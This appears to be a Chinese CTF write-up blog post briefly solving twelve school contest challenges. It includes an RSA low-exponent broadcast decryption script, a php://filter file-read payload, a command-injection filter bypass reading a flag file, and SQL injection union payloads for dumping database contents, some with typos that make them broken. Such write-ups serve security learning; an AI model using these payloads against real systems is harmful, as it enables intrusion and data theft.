2024年开学考wp

最新推荐文章于 2024-06-14 09:50:01 发布
最新推荐文章于 2024-06-14 09:50:01 发布
阅读量902 收藏 12
点赞数 7
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ndjnddjxn/article/details/136979997
版权

1.师姐的生日

这里要用bp爆破,先抓包,发送给Intruder库进行爆破,然后再发送到重发器找到flag。进行四位数字的爆破,payload中,类型选择number,从0000到1231。

2.EZ-RSA

from Crypto.Util.number import *

import gmpy2

flag = 'flag{*********************************}'

m=bytes_to_long(flag.encode())

def getN():

p=getPrime(256)

q=getPrime(256)

n=p*q

return n

e=0x3

n1=getN()

c1=pow(m,e,n1)

n2=getN()

c2=pow(m,e,n2)

n3=getN()

c3=pow(m,e,n3)

print("n=",[n1,n2,n3])

print("c=",[c1,c2,c3])

'''

n= [5567000486226353254524673454357147076118077122275789480555238584552332526459181641567858429587222587683345901310468140782420858931709570476562698953112801, 6982887363645354856540867035629441781549999700006363403940951376485517460506822033812812263179663875843737953430050436453298336104404304183964162702612863, 5569628780521526092136759047774448808289588145127191213956593902336353172559905282602383716258500935021056393917971164303539941268395159953652768614304911]

c= [4112523544883480830903403452517516825703078902670926405984774762024235980767805538947466914193950835488469608756778569692190967901730207690525300247682815, 4181292472036270897593568708931413787888488621274030741130549434467976405476555130890722346319549396800183827305452019796119873044279138566837264814627098, 3857434270788621361517349247277347831953021241414984430770586220424214110700999615785879462771584952744049357875753754209006439028080870626012342467148773]

解密脚本

import binascii,gmpy2 #导入库,binascii将数字转换成二进制字符串,gmpy2用于大数运算

n= [5567000486226353254524673454357147076118077122275789480555238584552332526459181641567858429587222587683345901310468140782420858931709570476562698953112801, 6982887363645354856540867035629441781549999700006363403940951376485517460506822033812812263179663875843737953430050436453298336104404304183964162702612863, 5569628780521526092136759047774448808289588145127191213956593902336353172559905282602383716258500935021056393917971164303539941268395159953652768614304911]

c= [4112523544883480830903403452517516825703078902670926405984774762024235980767805538947466914193950835488469608756778569692190967901730207690525300247682815, 4181292472036270897593568708931413787888488621274030741130549434467976405476555130890722346319549396800183827305452019796119873044279138566837264814627098, 3857434270788621361517349247277347831953021241414984430770586220424214110700999615785879462771584952744049357875753754209006439028080870626012342467148773]

from functools import reduce #用于对序列进行累积操作

def CRT(mi, ai): #中国剩余定理,用于合并c中的加密结果,mi模数列表,ai加密列表

assert(reduce(gmpy2.gcd,mi)==1) #模数是互质(它们的最大公约数)

assert (isinstance(mi, list) and isinstance(ai, list))

M = reduce(lambda x, y: x * y, mi)#计算所有模数的乘积M

ai_ti_Mi = [a * (M // m) * gmpy2.invert(M // m, m) for (m, a) in zip(mi, ai)]#m对应的加密结果a储存在ai_ti_mi列表中,x模m的乘法逆元

return reduce(lambda x, y: x + y, ai_ti_Mi) % M#将所有a相加,并对m取模得到crt结果

e=0x3#公钥指数

m=gmpy2.iroot(CRT(n, c), e)[0]#第一个元素是整数部分,用[0]获取

print(binascii.unhexlify(hex(m)[2:].strip("L")))#将明文从十六进制转化为十进制,即可得到flag

3.不要尝试爆破哦

用stegsolve扫描,找到key来打开加密的zip文件,得到很多base64编码,转化为图片,得到缺少定位角的二维码,用PS或PPT还原后扫描即可得到flag

4.re1

用IDA打开,然后寻找main函数,按R,F5进行反编译,得到的程序进行解读,3代替e,0代替O,字符替换,得到flag

5.留个后门

用代码审计工具D盾扫描后,查看文件post找到flag

6.Fuck

用base16,再用base32,最后用brain fuck解密,即可得到flag

7.师姐旅游的照片

用010 edtor扫描图片,末尾得到一串base64的密码,解密得到一半flag,然后在kali中分离出另一张图片,提示中的1607转化为16进制,然后图片的实际高为800转化为16进制,搜索后改掉即可看到另一半flag

8.来听一首音乐

先下载MP3mgeto,看到还有一张图片,相机型号为pass,将yunxi.mp3与MP3mgeto放在同一目录下,打开终端,输入Encode -X -P pass(密码)yunxi.mp3,该目录下找到被base64编码的flag解密即可

9.Gentle—sister

查看源码发现为get传参,在url后面加?My_paramater[]=1,即可得的flag

10.一个朴实无华的界面

打开环境是个静态页面,需要信息搜集爬虫协议robots.txt,返问0e1G7.php,然后根据得到的内容构造payload,G7=php://filter/convert.iconv.utf-8.utf-7/resource=flag.php(有好几种写法),再用base64解密即可

11.Rceeee

一个典型的过滤,根据提示输入?cmd=c\at/fl\ag | tee 1.txt ,然后打开1.txt即可。

12.斗宗强者恐怖如斯

这是SQL注入的题目,先用若密码爆破,得到用户名为admin,密码为admin123

判断注入类型 ?id=-1 ’)

暴库?id=-1') union select 1,2 database()--+

爆表  ?id=-1’)union select 1,2 group concat(table_name)from infooimation_schema.table where table_schema='x it if_sql' --+

爆列 ?id=-1'  union select 1,2 group concat(column_name)from infooimation_schema.columns where table_name='flag' --+

爆值  ?id=-1') union select 1,2,group_concat(flAg) from xiti_sql.flag --+

ndjnddjxn
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
华三H3C WP2024 POE交换机PSE版本210文件
01-11
华三H3C WP2024 POE交换机PSE版本210文件,用于解决端口异常断电、无法供电等问题。
2023年江西省工业互联网大赛WP
12-25
2023年江西省工业互联网大赛WP
2024年3月开学测试复现
2301_79880442的博客
03-19 937
复现wp
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
每日一题——Python实现PAT乙级1042 字符统计(举一反三+思想解读+逐步优化)
weixin_44915521的博客
06-09 1132
这些编程思想和哲学理念在编写高效、健壮的代码时至关重要。通过理解和应用这些原则,我们不仅能够写出性能更好的代码,还能在不同情况下做出更加明智的设计决策。通过理解和应用这些哲学和编程思想,可以在不同场景中灵活运用,写出更加高效、健壮和灵活的代码。评估需求:根据实际需求选择最合适的数据结构和算法。避免冗余:尽量避免不必要的重复计算和操作。权衡利弊:在空间和时间之间找到最佳平衡点。灵活应变:根据输入数据的特性,灵活使用动态数据结构和提前决策策略。
基于JavaScript 如何实现爬山算法以及优化方案
乐闻世界
06-10 1415
爬山算法(Hill Climbing Algorithm)是一种常见的启发式搜索算法,常用于解决优化问题。其核心思想是从一个初始状态出发,通过逐步选择使目标函数值增大的邻近状态来寻找最优解。接下来,我们将通过 JavaScript 实现一个简单的爬山算法,帮助大家理解其原理和应用。从一个初始状态开始。评估当前状态的目标函数值。在当前状态的邻居中选择一个目标函数值更大的状态。如果找到了更优的邻居,则移动到该邻居并重复步骤2和步骤3。如果没有更优的邻居,则算法结束,当前状态即为局部最优解。
2024.6.13刷题记录
最新发布
lshx4658的博客
06-14 692
当时没有想到怎么保证队内全都是窗口内的元素,答案:“当队头元素在窗口的左边的时候,弹出队头”,虽然不能保证队内一直没有窗口外的元素,但是能保证使用到的队内元素(队头)全是窗口内元素。当时是有想到这个方法的,但是以为不行,一下没转过来弯。队列储存索引而不是元素,通过储存索引使我们能够快速判断元素是否出窗口。不会,思路来自题解(
Java——简单图书管理系统
m0_74100417的博客
06-09 1606
数据类型变量iffor数组方法类和对象封装继承多态抽象类和接口今天就是把上述知识点全部都用起来 图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理
python迁移数据教程
2402_85292291的博客
06-13 643
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
YesPMP探索Python在生活中的应用,助力提升开发效率
YesPMP20的博客
06-13 766
Python是一种简单易学、高效强大的编程语言,正变成越来越多人选择的热门技能。学习Python不仅可以提供更多就业机会,还能让自己在职场更加有竞争力,那可以去哪里拓展自己的技能呢?
Python | Leetcode Python题解之第149题直线上最多的点数
Mopes__的博客
06-14 435
Python | Leetcode Python题解之第149题直线上最多的点数
Python基础速成
weixin_74163644的博客
06-11 389
文件操作 文件读取 with open语法 文件写入 注意事项 文件追加 异常、模块与包 捕获异常 捕获方法 捕获传递 模块的导入与自定义 定义 导入方式 自定义 测试模块 注意事项 python包 定义 操作 第三方包 定义 pip指令安装包
paddleocr实验过程
mddCSDN的博客
06-11 383
切割后的数据在train_data中,注意切割后的数据前缀默认是当前目录,因此建议切割数据在liunx中进行。或者修改下面--datasetRootPath中的default。如果在Win中切割,放入liunx中训练。1、打开tmux窗口启动,这样断开连接后台可以继续训练。2、根据需求修改配置文件,如输出名称,数据集位置,注意暂时不要改吧epoch,训练容易报错。建议在liunx中指定。
深入理解Python多进程
这家伙很懒,什么都没有留下
06-12 716
本文深入介绍了Python多进程编程的基础概念、实现原理、使用方法以及实战案例。通过本文的学习,读者可以全面理解和掌握Python多进程编程的相关知识,并能够在实际项目中应用多进程技术来提高程序的执行效率。需要注意的是,虽然多进程技术能够带来性能上的提升,但也会带来一些额外的问题和复杂性,如进程间通信、进程同步等。因此,在使用多进程技术时,需要根据实际情况进行权衡和选择。
Windows10下安装GPU环境Cuda和Pytorch教程图解
weixin_40547993的博客
06-12 1280
在深度学习和高性能计算领域,利用GPU进行计算已经成为提升效率的关键手段。CUDA是NVIDIA推出的并行计算平台和编程模型,它使得开发者能够利用NVIDIA GPU的强大计算能力。同时,PyTorch作为一个广泛使用的深度学习框架,以其易用性和灵活的动态计算图受到了研究人员和开发者的青睐。为了在Windows10系统上充分利用GPU进行深度学习训练,需要正确安装和配置CUDA和PyTorch。
【Java02】Java中数组的定义与初始化
饮冰室
06-10 563
推荐第一种方式。这种方式容易让人理解,数据类型是type[],对象名称是arrayName。第二种方式有些老旧了。由于数组是一种引用变量(也就是一个指针),所以定义的时候还没有指向任何有效的内存空间,因此在定义数组的时候不能指定数组的长度,也不能直接使用。必须进行初始化。可以使用var让系统自动推断变量类型,既可以用于静态初始化,也可以用于动态初始化。
2018年美亚杯wp
12-23
2018年美亚杯wp(世界杯预选赛)是一场激动人心的比赛。在这次比赛中,来自美洲和亚洲的国家队齐聚一堂,争夺着参加世界杯的资格。比赛分为几个阶段,包括小组赛、淘汰赛和最终决赛。在小组赛阶段,各个国家队都...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值